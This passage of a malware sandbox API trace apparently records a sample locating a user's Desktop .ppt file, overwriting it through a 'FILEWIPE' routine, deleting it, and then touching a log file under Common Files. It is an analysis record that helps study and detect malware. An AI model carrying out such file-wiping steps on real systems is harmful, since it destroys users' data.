wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.526] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.526] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.526] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.526] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.526] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.527] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.527] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.527] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.527] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.527] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0031.527] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0031.527] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0031.527] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.527] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.527] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.528] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.529] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.529] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0xf3fa9760, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x0, dwReserved1=0x777648, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 0x7c2100 [0031.529] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0031.529] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.529] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.529] CharLowerBuffW (in: lpsz="byte[33831]", cchLength=0xb | out: lpsz="byte[33831]") returned 0xb [0031.530] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.530] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.530] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.530] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.530] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.530] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.531] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.531] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.531] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\rsb1on7f5ytvakx.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.532] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.532] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.532] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.532] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.532] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.532] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.532] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.532] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.532] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.532] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.533] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.533] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.533] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.533] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.533] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.533] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", lpFilePart=0x0) returned 0x5a [0031.533] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0x12acf980, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 0x7c2100 [0031.533] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\rsb1on7f5ytvakx.ppt")) returned 1 [0031.535] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0x12acf980, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 0 [0031.535] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.535] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.535] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.535] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.535] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.535] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.536] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.536] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.536] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.536] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.537] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x8b7, lpOverlapped=0x0) returned 1 [0031.537] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.537] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x8b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.537] SetFilePointerEx (in: hFile=0x140, 